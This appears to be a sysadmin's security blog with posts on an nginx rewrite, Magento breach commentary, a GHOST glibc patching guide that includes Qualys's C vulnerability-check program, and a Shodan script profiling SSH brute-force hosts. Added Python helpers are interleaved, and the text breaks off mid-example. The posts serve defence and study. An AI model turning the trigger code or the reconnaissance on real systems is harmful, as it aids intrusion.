Yinette's Webshite

A collection of security stuff and all sorts of other random shit.

Word 2010’s Bizarre Take on Urlencodes and How to Fix It in Nginx

I came across a really odd corner case in a customer ticket today, and I was unable to find anything related to this problem that involved rewrites, so here it is! My first real kinda non-infosec post. Shoutout to all sysadmins and ops in the world, the struggle is real! <3

The Problem

In Microsoft Word 2010, URLs that have been pasted into a document will hyperlink; however, for a reason I cannot find any reasonable explanation for, this is what happens:

Example URL:

http://site.com/content#subcontent

What Word passes to the default browser:

http://site.com/content%20-%20subcontent

Yay.

Basically # gets turned into %20-%20.

A desperate search on the intertubes revealed you can actually implement a registry hack to fix this. In this case, that is simply not possible. Word documents with macros that change registry values = malware, idk what it does, it’s doing the WRONG thing.

The Solution

After a good hour making some of the most monstrous regular expressions I think I’ve ever made, I finally started getting somewhere.

rewrite ^(.*)\ -\ (.*)$ $1#$2 redirect;

In the end this rewrite rule was born.

Note! – Nginx percent-decodes the URI (so %20 becomes a space) before the rewrite rule ever sees it.

Here it is in action!

curl -v 'http://localhost/index.html%20-%20thingy'

2015/08/26 13:26:58 [notice] 17521#0: *67 "^(.*)\ -\ (.*)$" matches "/index.html - thingy", client: 127.0.0.1, server: localhost, request: "GET /index.html%20-%20thingy HTTP/1.1", host: "localhost"

< HTTP/1.1 302 Moved Temporarily
< Location: http://localhost/index.html#thingy

Yay!
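As an added example that is not from the original post, here is a small Python emulation of what that rewrite rule does to a request. It shows the three things worth knowing before deploying the rule: nginx matches against the already percent-decoded path, the greedy first group means only the last ‘ - ’ becomes the ‘#’, and any legitimate path containing ‘ - ’ is redirected too. The function names and sample paths are my own.

```python
import re
from urllib.parse import unquote

# The post's rule, `rewrite ^(.*)\ -\ (.*)$ $1#$2 redirect;`, as a Python regex.
# nginx's "\ " is an escaped literal space; Python needs no escape for it.
WORD_REWRITE = re.compile(r"^(.*) - (.*)$")


def simulate_rewrite(raw_request_uri):
    """Emulate the rewrite rule against one raw request URI.

    Returns the path nginx would put in the Location header, or None when the
    rule does not match and the request is served as-is. (Hypothetical helper,
    written for this example.)
    """
    # rewrite matches against $uri: the path without the query string, already
    # percent-decoded, which is why the rule sees " - " rather than "%20-%20".
    path, _, args = raw_request_uri.partition("?")
    uri = unquote(path)

    match = WORD_REWRITE.match(uri)
    if match is None:
        return None

    location = "%s#%s" % (match.group(1), match.group(2))
    # nginx appends the original query string to the replacement unless the
    # replacement ends with "?". After a "#", that puts the arguments inside
    # the fragment, so requests that carry a query string come out wrong.
    if args:
        location += "?" + args
    return location


def collateral(paths):
    """Paths that contain " - " legitimately and would also be redirected by the rule."""
    return [p for p in paths if simulate_rewrite(p) is not None]
```

The query-string case is the one to watch: because the replacement has no trailing ‘?’, nginx appends the original arguments after the ‘#’, and a browser then treats them as part of the fragment.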

Alarming Trends With Recent Magento Breaches

Note: Sparse on technical details due to ongoing investigations; this post is just commentary.

As a Systems Administrator, I’ve seen many kinds of web application compromises. From WordPress, to Joomla, to OSCommerce, you name it.

As of recently, a new kind of vulnerability has arisen for the popular Magento ecommerce platform, aptly called “Shoplift”.[1] This bug has some serious nastiness that allows for some very bad things to happen to an unpatched site; the exploit itself allows:

  • Authentication Bypass
  • Remote File Inclusion/Remote Code Execution (mostly due to auth bypass)
  • SQL Query Injection

Differences in the usual compromise

This Magento exploit poses a rather different kind of threat than the usual dime-a-dozen WordPress and Joomla sites have. Observing some activity, and indeed correlating with others’ discoveries (namely Sucuri)[2], I’m noticing something rather different about wild exploitations of Shoplift. Here’s what I can see and my thoughts on it.

  • Rare that webshells and other specific malicious files are being uploaded.

While I have seen it in this particular exploit in the wild, it does not appear to be anything more than access persistence that is then sold on to do bad things (like spamming).

  • Attackers are attempting to remain low profile.

As with above, noting they’re not leaving traces of their presence that particular anti-virus and web application firewalls can mitigate; they are mostly using parts of the site to their advantage, or are installing innocuous plugins to achieve their goal.

  • Changes to core code are very subtle and usually try to blend in with the other site functions.

Backdoor access to administrative functions via very slight changes to code has been observed.

  • The focus appears to be that of Customer information and sensitive financial details.

Given the nature of information that a Magento site will see and store, I think it is highly likely this exploit is going to attract the internet’s seedy underbelly of privacy theft, credit card fraud, and other very malicious and serious offences, and what I have seen so far gives me high confidence of this being the case.

  • A very dedicated core group set to work getting access only days after the details of the exploit were disclosed by the discovering party.

As in the Sucuri blog, these two Russian IPs have been very busy.

  • Even after a site is patched, admin credentials belonging to attackers can still be present in a database.

This leads to the next part of this post.

What you need to do as a Magento site maintainer/developer

  • Even if you have applied a patch, audit your administrator logs, and administrator user accounts!

  • If in doubt, it’s probably malicious. Engage a company like Sucuri to look for malware and malicious modifications to site code, or completely re-install the core site files.

  • Observe what your customers are saying. If they report that they are receiving emails purporting to be from your business asking for credit card details, you’ve got an issue.

In conclusion, a major exploit and very widespread attacks were only a matter of time for Magento, as with any popular web application. The implications however are extremely serious, and I would be unsurprised to hear of future major credit card breaches similar to the PoS malware at Target and other US retail/restaurant chains, and the major breaches of sites using unpatched ColdFusion installations.[4]

Keep watching your logs.

References

  1. https://shoplift.byte.nl/ – what is shoplift?
  2. https://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.html – Sucuri reporting of exploits in the wild.
  3. http://www.oaic.gov.au/privacy/privacy-resources/privacy-guides/data-breach-notification-a-guide-to-handling-personal-information-security-breaches – Advice (For Australian companies) on how to handle privacy breaches.
  4. http://krebsonsecurity.com/2014/03/the-long-tail-of-coldfusion-fail/ – Details into serious breaches of information on ColdFusion sites used for ecommerce.

GHOST in the Library

Upgrade alone complex – Updating glibc without the pain, misery, and the laughing man

So, there’s a 12-year-old bug in glibc, and it allows RCE with the permissions of the running process, how wonderful.

Oh yeah, and a simple DNS lookup can cause it if you use a particular function from the ’80s.

And yes, it’s now our problem.

Here’s a link to the write-up provided by Qualys: http://www.openwall.com/lists/oss-security/2015/01/27/9

And here’s a post by Rob at Errata Security called “You shouldn’t be using gethostbyname() anyway” – good advice.

I’m starting to get the hang of these named vulnerabilities, just not the media frenzy that comes after, so, I thought I’d do something about it.

Anyway, time to bring some calm to an otherwise very distressing situation for some sysadmins, and show how you can ensure everything is patched and ok, with MINIMAL downtime.

let’s begin

Check if you are vulnerable!

The people at Qualys who found this bug provided a nice little PoC written in C that you can run to check if your glibc is vulnerable.

Just copypasta the code below into your text editor of choice and save as ‘GHOST.c’ or something along those lines.

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
    puts("vulnerable");
    exit(EXIT_SUCCESS);
  }
  if (retval == ERANGE) {
    puts("not vulnerable");
    exit(EXIT_SUCCESS);
  }
  puts("should not happen");
  exit(EXIT_FAILURE);
}

Then, once that’s done do the following:

gcc GHOST.c -o GHOST

Replace GHOST.c with whatever you called the file above.

Preferably not as root, run your new binary like so:

./GHOST

If you get “vulnerable” as the output, you need to upgrade, so keep following this guide; otherwise, you’re set! But it’s best to check below, where I’m trying to find stuff still running using older libs.

Upgrade time!

Upgrade your packages, be it with aptitude, apt, pacman, yum or emerge. If your upstream has updated the package, an ‘upgrade all’ should suffice and bring a new glibc into your system.

If you only want to install the new glibc package, there is a way to do it for each package manager, it should be documented or discussed, google will help with update single package <packagemanager> as the query.

Here are some popular distro advisories and notifications where the packages have been upgraded:

Debian’s Announcement: https://lists.debian.org/debian-security-announce/2015/msg00025.html

Redhat’s Announcement: https://access.redhat.com/articles/1332213

Your init should do a warm restart and pull in the new glibc; this behaviour has been observed on Debian Wheezy with sysvinit.

Finding things still running the old glibc

Let’s face it, sometimes we cannot simply restart. Until we reach the nirvana of everything being clustered, we’ll have to live with this.

Here’s a way to find services and processes that are still using the old glibc. For this example, I shall be using a Debian Wheezy machine.

The command is:

sudo lsof -n | grep libc-

The output will be something like this:

init          1              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
udevd       374              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rpcbind    1787              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rpc.statd  1818             statd  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rpc.idmap  1832              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rsyslogd   2187              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rs:main    2187  2192        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rsyslogd   2187  2194        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rsyslogd   2187  2195        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
acpid      2240              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
atd        2259            daemon  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nmbd       2277              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
dbus-daem  2311        messagebus  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
smbd       2329              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lldpd      2352              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lldpd      2354            _lldpd  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
smbd       2372              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
avahi-dae  2386             avahi  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
avahi-dae  2387             avahi  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2484              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2485          www-data  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2486          www-data  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2487          www-data  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2488          www-data  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2519        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2520        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2521        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2522        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2523        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2524        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2525        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2526        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2527        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2528        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
cron       2548              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
dhclient   2582              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
gmain      2655  2741        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
gdbus      2655  2836        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
polkitd    2841              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
gdbus      2841  2968        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
exim4      3083       Debian-exim  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
sshd       3108              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
minissdpd  3133              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3143              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3144              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3145              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3146              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3147              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3148              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
smbd      11793              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
udevd     27806              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
sshd      28095              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
bash      28100              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
lsof      28160              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
grep      28161              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
lsof      28162              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213 28214        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213 28215        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213 28216        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213 28217        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322              bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322 28323        bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322 28324        bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322 28325        bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322 28326        bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so

Ok, let me point out a few things here off the bat.

init          1              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so

init here is running the updated version of glibc; notice the FD column, right after ‘root’, says ‘mem’? This is a good thing. It’s memory-mapped but has an existing file on disk behind it.

However, if we look at libvirtd:

libvirtd   2518  2528        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so

the ‘mem’ is now ‘DEL’; this means it’s mapped in memory, but the file behind it no longer exists. This is still running a vulnerable glibc.

Update!

A follower of mine @aptcat noticed something different with their lsof output with a 32-bit kernel:

syslogd    1435               root  mem       REG              253,3            74591600 (deleted)/lib/i386-linux-gnu/libc-2.13.so (stat: No such file or directory)

You will note that lsof still has it in memory, but notes the file itself is deleted.

Thanks for that @aptcat!

The solution? Restart services!

You can get some easy wins with daemons like sshd, libvirtd, postfix/exim4, etc since they can restart without showing any major visible disruption. Nginx/apache is in the list of these, but it depends on how much config it has to parse and how much traffic you get at any one moment.

Other services like mysqld, redis, etc. that will either kill important data or take a noticeable time to start up again might need to be scheduled in with your user for when an appropriate time to restart these is.

I would still highly recommend a full reboot anyway, as this will ensure everything comes back with a fresh glibc, and you won’t get nasty surprises.

Using sysvinit, the way to restart these as root/sudo is as follows:

sudo service THING restart

Though, note that some services are named differently than you would think. For example sshd under Debian sysvinit is ‘ssh’ under the service control script; use tab-complete (mash TAB) if you are unsure. (Likewise with apache2 on RHEL/CentOS, it can sometimes be httpd)

Systemd users will be able to use sudo systemctl restart THING, however I’d imagine systems that use systemd would have already patched glibc… Oh well, might be different for everyone.

After that, assuming the service has restarted without issue and everything looks peachy, the ‘DEL’ should change to ‘mem’.

Now it’s just a matter of hunting down other services or programs to restart.

Here’s a quick one to get a list of processes that are still showing ‘DEL’:

sudo lsof -n | grep libc- | grep DEL
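To make that check repeatable, here is an added Python example (not from the original post) that parses `lsof -n` output and reports every process still mapping a deleted libc, collapsing thread lines onto their PID and treating both the 64-bit ‘DEL’ form and the 32-bit ‘(deleted)’ form @aptcat reported as stale. The sample lines are taken from the output above; the script and function names are my own.

```python
import re
import sys

# Sample `lsof -n` lines in the format shown above: a process already on the new
# library ("mem"), 64-bit "DEL" mappings, thread lines with an extra TID column,
# and the 32-bit "(deleted)" variant @aptcat reported.
SAMPLE_LSOF = """\
init          1              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
udevd       374              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2519        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2485          www-data  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
bash      28100              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
syslogd    1435               root  mem       REG              253,3            74591600 (deleted)/lib/i386-linux-gnu/libc-2.13.so (stat: No such file or directory)
"""

LIBC_PATH = re.compile(r"/libc-[0-9.]+\.so")


def parse_lsof_line(line):
    """Return (command, pid, user, fd) for one lsof line, or None for headers/junk.

    lsof inserts a TID column for thread lines, so the USER field is the third
    token for a process line and the fourth for a thread line; an all-digit
    third token is taken to be a TID (numeric usernames would confuse this).
    """
    tokens = line.split()
    if len(tokens) < 5 or not tokens[1].isdigit():
        return None
    command, pid = tokens[0], int(tokens[1])
    if tokens[2].isdigit():
        user, fd = tokens[3], tokens[4]
    else:
        user, fd = tokens[2], tokens[3]
    return command, pid, user, fd


def stale_libc_processes(lsof_output):
    """Map pid -> (command, user) for processes still mapping a deleted libc.

    A mapping is stale when the FD column reads "DEL" (64-bit output above) or
    the path is flagged "(deleted)" (32-bit form). Thread lines collapse onto
    their process, so each PID is reported once.
    """
    stale = {}
    for line in lsof_output.splitlines():
        if not LIBC_PATH.search(line):
            continue
        parsed = parse_lsof_line(line)
        if parsed is None:
            continue
        command, pid, user, fd = parsed
        if fd == "DEL" or "(deleted)" in line:
            stale.setdefault(pid, (command, user))
    return stale


def restart_candidates(lsof_output):
    """Distinct command names to map onto `service THING restart` (names can differ, e.g. sshd -> ssh)."""
    return sorted({command for command, _ in stale_libc_processes(lsof_output).values()})


if __name__ == "__main__":
    # usage: sudo lsof -n | python3 stale_libc.py
    for pid, (command, user) in sorted(stale_libc_processes(sys.stdin.read()).items()):
        print("%-10s %6d %s" % (command, pid, user))
```

Piping `sudo lsof -n` into it gives one line per PID instead of one per thread, which makes the libvirtd and named entries above far easier to read.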

That should be it.

If you have any suggestions on how to do any of this better, please don’t hesitate to mention me on twitter (@yinettesys), I will RT and converse with those who provide much better methodology than mine.

Now, let’s hope the media scrum isn’t as large as it has been in the past.

Using Shodan to Find Similarities Between Hosts in SSH Brute Force Ranges

So, I was messing with Shodan this morning after reading Cybergibbon’s shenanigans with the Heatmiser Wifi Thermostat, and reviewing the IDS and firewall logs as I do each morning.

I wanted to see how much traffic the router had blocked from a particular range that likes to attack all the open SSH stuff on this particular network:

 292K   12M DROP       all  --  *      *       61.174.51.0/24       0.0.0.0/0

heh neat. 12M of TCP ‘SYN’ over about two weeks.

Then with shodan fresh in the mind, I got an idea.

Preamble

For those who don’t know, the range of 61.147.51.0/24 is a range inside China that constantly attacks the reachable internet for weak SSH credentials, all day, every day. If you watch the Norse attack map, you might see it doing its thing.

There are other ranges within China that exhibit the same behaviour, namely 144.0.0.0/24 and 116.10.191.0/24, but as a whole the entire 61.147.0.0/16 range is bad news. Never seen legit traffic from this range ever.

Sure SSH scans happen, it’s the internet, and we have a password policy that mandates passwords cannot be guessable by any 3 year old. However, whoever is behind this is putting a fair amount of trouble and resources into doing this; it’s rather insane.

Well so am I, so let’s fuck with them.

Release the shodan!

So, shodan is awesome. It’s a search engine for random stuff open to the internet. You can find a lot of fun, sadness and potentially a lot of trouble if you look for the right (or wrong) thing and play with it.

Shodan is perfect for this research project, since I don’t have to waste my oh so valuable resources to compile and run masscan (oh noes muh cycles!) or money to do it from a throw-away cloud shitbox. But more seriously, why risk being scanned back (or DDoS’d) for performing reconnaissance? or being banhammered from AWS, Google Cloud, or OVH for doing naughty things?

Shodan can take that risk for you if you don’t want to. I’d be more than happy to do it all myself (I am certainly capable of doing so), but that’s not in scope of this post :)

So, Shodan has an API, cool. I’m a sysadmin, give me a Python library. Oh look, they have one.

I fired up my python virtualenv, ran vim and got to work.

The result was an awful script that did awful things:

#!/usr/bin/env python

import shodan

SUPER_SECRET_API_KEY = "LOL NOPE"

api = shodan.Shodan(SUPER_SECRET_API_KEY)

naughty_pricks = [
    "61.174.51.45",
    "61.174.51.198",
    "61.174.51.202",
    "61.174.51.235",
    "61.174.51.231",
    "61.174.51.230",
    "61.174.51.204",
    "61.174.51.216",
    "61.174.51.201",
    "61.174.51.232",
    "61.174.51.227",
    "61.174.51.208",
    "61.174.51.228",
    "61.174.51.226",
    "61.174.51.209",
    "61.174.51.225",
    "61.174.51.217",
    "61.174.51.195",
    "61.174.51.212",
    "61.174.51.234",
    "61.174.51.214",
    "61.174.51.207",
    "61.174.51.196",
    "61.174.51.211",
    "61.174.51.200",
    "61.174.51.218",
    "61.174.51.205",
    "61.174.51.215",
    "61.174.51.197",
    "61.174.51.229",
    "61.174.51.213",
    "61.174.51.199",
    "61.174.51.221",
    "61.174.51.233",
    "61.174.51.224",
    "61.174.51.194",
    "61.174.51.203",
    "61.174.51.223",
    "61.174.51.210",
    "61.174.51.222",
    "61.174.51.219",
    "61.174.51.206",
    "61.174.51.220",
]

for prick in naughty_pricks:

    # one Shodan host lookup per IP; the result carries the banners per port
    host = api.host(prick)

#I know this looks bad and I should feel bad. but idgaf call the cops.

    print("""
---------------------------------------

IP:  ***%s***

ISP: ***%s***
    """ % (host['ip_str'], host.get('org', 'n/a')))

    for item in host['data']:
        print("""
Port: ***%s***

Banner:

    %s
""" % (item['port'], item['data']))

The result was this semi-readable markdown output.

From here, I could then grep and mould the results as I saw fit.

The analysis

Since the hosts all had port 137 open (NetBIOS), this gave me some information that I found useful for profiling our friends.

A grep for hostnames gave me a nice tight list of all the hostnames of these systems:

IDC-073C1DF8683 <0x20>
IDC-1D5C6BBDF3A <0x20>
IDC-1D6EF802E40 <0x20>
IDC-1DCEB780E28 <0x20>
IDC-22D7C9E2B02 <0x20>
IDC-2533F122B13 <0x20>
IDC-26A1C33F316 <0x20>
IDC-7213F7E9432 <0x20>
IDC-85365D05ADF <0x20>
IDC-8DDE4A14FF8 <0x20>
IDC-996DA0223DD <0x20>
IDC-A80C6B30775 <0x20>
IDC-CECC265ED8B <0x20>
IDC-D94F7772A93 <0x20>
IDC-DC2D985494C <0x20>
IDC-EAE1FBD4E07 <0x20>
IDC-FB92254677F <0x20>
ORGANIZA-D00C80 <0x20>
TENGYI-163CAAB8 <0x20>
TENGYI-1A7B7025 <0x20>
TENGYI-56AB5E32 <0x20>
TENGYI-75574DC7 <0x20>
TENGYI-D1DEECDA <0x20>
TENGYI-EA32E16E <0x20>
WWW-0C90D5E834F <0x20>
WWW-10B06E72287 <0x20>
WWW-17385A1E7D9 <0x20>
WWW-1F45ED6876A <0x20>
WWW-357C3D5BA92 <0x20>
WWW-3E63653E8D7 <0x20>
WWW-69EB0C42237 <0x20>
WWW-6DCC428E422 <0x20>
WWW-7370E8EC3E0 <0x20>
WWW-83CE25E3961 <0x20>
WWW-890860C26E3 <0x20>
WWW-8D870A2DAE6 <0x20>
WWW-8FACE61F8D1 <0x20>
WWW-C0F7DF227B2 <0x20>
WWW-C8ABBE387A2 <0x20>
WWW-CB73E270F45 <0x20>
WWW-D7BB30955E9 <0x20>
WWW-E099932AEE8 <0x20>

I asked on Twitter earlier today whether the IDC- and other prefixes meant anything, but the only thing I could get from it was that it’s possibly a GUID, truncated due to the NetBIOS 15-character limit on hostname values.

The IDC- prefixed hostname is not unique to these machines; in fact, using Shodan I was able to find similar instances from other countries too, but the bulk are in China and the US. Same with the WWW- prefix, just more Chinese hits.

From what I can find around the intertubes, ‘TENGYI’ or Teng Yi is a name given to males in China, so probably some dude’s name.

The only one that stands out is ORGANIZA at IP 61.174.51.232, which is Spanish for “organized”; I think it’s generic. Might mean something to someone. As far as the other hosts go, this one was run of the mill, only port 137 is open.

Running Services

Doing a quick count, the following was discovered:

43 have port 137 (NetBIOS) open (all of them) with each on the default WORKGROUP workgroup.

32 have port 21 (FTP) open with either Serv-U or Filezilla-Server as the ftpd

1 has port 22 (SSH) open with the opening string SSH-1.99-OpenSSH_3.9p1

1 has port 443 (SSL) open, was unable to obtain certificate because the port is now closed.

1 has port 445 (MS-RPC) open that had a semi-successful Anonymous login when shodan did a pass:

Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
session request to 61.174.51.213 failed (Called name not present)
session request to 61 failed (Called name not present)
Anonymous login successful

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------

3 have port 5432 (PostgreSQL) open, all of which responded with could not create socket: Too many open files lol

1 had port 80 (HTTP) open, responded with a HTTP 400 with no server header when shodan queried it.

2 had port 9200 open, running apache httpd, returned HTTP 403 and had the server header Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.6m That’s too old for Heartbleed btw, but all sorts of other shit lurks within versions that old.

Layer 2 Intelligence

Some of the NetBIOS responses contained the machine’s NIC MAC Address, here’s a list of them:

MAC: 00:19:bb:39:2e:5e
MAC: 00:19:bb:3d:e3:90
MAC: 00:19:bb:3e:cd:90
MAC: 00:1a:4b:a4:fc:ac
MAC: 00:1a:4b:a5:34:1a
MAC: 00:1b:78:72:78:48
MAC: 00:1b:78:73:97:82
MAC: 00:1b:78:75:24:46
MAC: 00:1b:78:76:dd:5e
MAC: 00:1b:78:ca:4e:8a
MAC: 00:1c:c4:78:fb:84
MAC: 00:1e:0b:47:2a:fc
MAC: 00:1e:0b:5e:1d:7a
MAC: 00:1e:0b:5f:3a:54
MAC: 00:1e:0b:5f:3f:ec
MAC: 00:1e:0b:5f:5e:fa
MAC: 00:1e:0b:8f:c0:08
MAC: 00:1e:67:13:c7:1e
MAC: 00:1e:67:25:ee:76
MAC: 00:1e:67:66:b0:be
MAC: 00:1e:c9:b6:ce:44
MAC: 00:1f:29:0a:f5:f6
MAC: 00:1f:29:64:a9:46
MAC: 00:1f:29:ca:a6:fe
MAC: 00:21:5a:45:6c:6a
MAC: 00:22:19:51:97:e7
MAC: 00:22:19:51:ad:4a
MAC: 00:22:19:ba:89:bd
MAC: 00:24:e8:54:29:32
MAC: 00:24:e8:5a:91:66
MAC: 00:24:e8:5a:91:81
MAC: 00:24:e8:5a:9f:aa
MAC: 00:24:e8:5a:b3:1d
MAC: 00:24:e8:5a:b3:28
MAC: 08:60:6e:57:29:e7
MAC: 68:b5:99:b4:04:86
MAC: bc:5f:f4:91:ee:51
MAC: bc:5f:f4:91:ee:d8
MAC: bc:5f:f4:91:ee:ea
MAC: c8:60:00:83:be:1a
MAC: d4:85:64:53:51:dc
MAC: d4:85:64:53:dc:40

From here, we can cut out only the first three bytes of the MAC to give us the manufacturer-unique part (the OUI), and feed that through a database:

00:19:bb - Hewlett Packard
00:1a:4b - Hewlett Packard
00:1b:78 - Hewlett Packard
00:1c:c4 - Hewlett Packard
00:1e:0b - Hewlett Packard
00:1e:67 - Intel
00:1e:c9 - Dell
00:1f:29 - Hewlett Packard
00:21:5a - Hewlett Packard
00:22:19 - Dell
00:24:e8 - Dell
08:60:6e - ASUSTek Computer
68:b5:99 - Hewlett Packard
bc:5f:f4 - ASRock
c8:60:00 - ASUSTek Computer
d4:85:64 - Hewlett Packard

Interesting mix, but one very obvious favorite in this list.
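To turn that grep-and-mould step into something repeatable, here is an added Python example, not part of the original post, that parses the markdown-style output the script above prints and produces the figures the preceding sections report by hand: the per-port host counts, the NetBIOS <0x20> server names and their prefixes, and the vendor tally from the first three octets of each MAC. The report text is constructed in the script’s layout using hostnames and MACs from the lists above; the OUI table is a subset of the lookups listed, and the function names are my own.

```python
import re
from collections import Counter

# Constructed report in the layout the post's script prints (an IP/ISP header per
# host, then a Port/Banner block per service). The hostnames and MACs come from the
# lists in the post; the text around them is constructed, not Shodan's real banner.
SAMPLE_REPORT = """
---------------------------------------

IP:  ***61.174.51.45***

ISP: ***Example Telecom (constructed)***

Port: ***137***

Banner:

    IDC-073C1DF8683 <0x20>
    WORKGROUP <0x00>
    MAC: 00:19:bb:39:2e:5e

Port: ***21***

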